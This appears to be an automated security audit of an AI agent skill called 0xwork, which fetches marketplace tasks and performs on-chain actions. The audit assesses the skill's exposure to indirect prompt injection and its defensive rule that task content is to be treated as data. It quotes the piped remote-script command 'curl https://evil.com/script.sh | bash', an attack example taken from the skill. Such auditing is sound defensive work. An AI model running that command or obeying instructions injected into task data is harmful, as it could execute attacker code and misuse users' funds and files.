0xwork
Fail
Audited by Gen Agent Trust Hub on Apr 1, 2026
Risk Level: HIGHPROMPT_INJECTIONREMOTE_CODE_EXECUTIONCOMMAND_EXECUTIONEXTERNAL_DOWNLOADS
Full Analysis
- [PROMPT_INJECTION]: The skill processes untrusted user-generated marketplace content, creating a surface for indirect prompt injection.\n
- Ingestion points: Task data retrieved via
0xwork discoverand0xwork task <id>inSKILL.md, and external web content fetched for research tasks.\n - Boundary markers: The skill includes a dedicated 'Security: Untrusted Content Handling' section with non-negotiable rules for the agent to treat task content as data and ignore any instructions found within it.\n
- Capability inventory: The agent can perform on-chain transactions (staking, claiming, submitting deliverables) via the CLI and potentially execute code if equipped with developer tools.\n
- Sanitization: Relies on prompt-level instructions and defensive guidance to prevent the agent from acting on malicious instructions embedded in task descriptions.\n- [REMOTE_CODE_EXECUTION]: Found the pattern
curl https://evil.com/script.sh | bashinSKILL.md. This is explicitly documented as an example of a malicious attack that the agent should avoid, rather than an instruction to be followed.\n- [COMMAND_EXECUTION]: The skill usesnpm installandnpxto manage the@0xwork/clitool and involves file system interactions for managing task deliverables and.envconfiguration files.\n- [EXTERNAL_DOWNLOADS]: The skill installs software from the npm registry and encourages the use of web search tools to download and process external information for research tasks.
Recommendations
- HIGH: Downloads and executes remote code from: https://evil.com/script.sh - DO NOT USE without thorough review
Audit Metadata